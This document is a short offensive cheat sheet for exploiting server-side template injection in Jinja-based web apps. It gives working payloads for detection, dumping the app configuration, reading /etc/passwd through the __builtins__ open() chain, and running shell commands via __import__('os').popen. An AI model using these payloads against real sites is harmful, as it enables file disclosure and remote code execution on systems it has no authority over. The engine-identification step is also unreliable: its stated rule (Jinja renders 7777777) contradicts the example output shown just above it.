JINJA (EXPLOITATION)

Jinja is a template engine commonly used in Python web frameworks such as Flask or Django.

INFORMATION DISCLOSURE

IDENTIFICATION

#identification
root@oco:~$ BROWSER > {targetSite:port}
 input field: ${7*7}
  - Hi ${7*7}!
     - failed
 input field: {{7*7}}
  - Hi 49!
     - Success
 input field: {{7*'7'}}
  - Hi 49!
     - Success

 * {{7*'7'}} distinguishes the engine: Jinja renders 7777777, Twig renders 49

DUMP CONFIGURATION DETAILS

#obtain internal information about the web application, including configuration details and the web application's source code
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ config.items() }}

LFI

#dump all available built-in Python functions
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ self.__init__.__globals__.__builtins__ }}
 
#LFI: use Python's built-in open() to read a local file
#"open" cannot be called directly from the template; reach it through the __builtins__ dictionary dumped above
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

RCE

#dump all available built-in Python functions
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ self.__init__.__globals__.__builtins__ }}

#command execution goes through the os module (system or popen)
#if the target has not already imported os, load it with __import__ from __builtins__
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
